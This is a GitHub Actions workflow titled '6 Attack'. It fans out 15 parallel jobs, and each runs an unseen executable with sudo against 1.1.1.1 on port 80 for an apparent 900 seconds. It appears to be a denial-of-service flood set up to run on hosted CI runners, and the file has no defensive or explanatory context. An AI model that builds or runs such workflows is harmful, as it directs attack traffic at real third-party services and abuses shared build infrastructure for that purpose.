name: 6 Attack
on: workflow_dispatch
jobs:
  attack:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x 6
    - run: sudo ./6 1.1.1.1 80 10 900
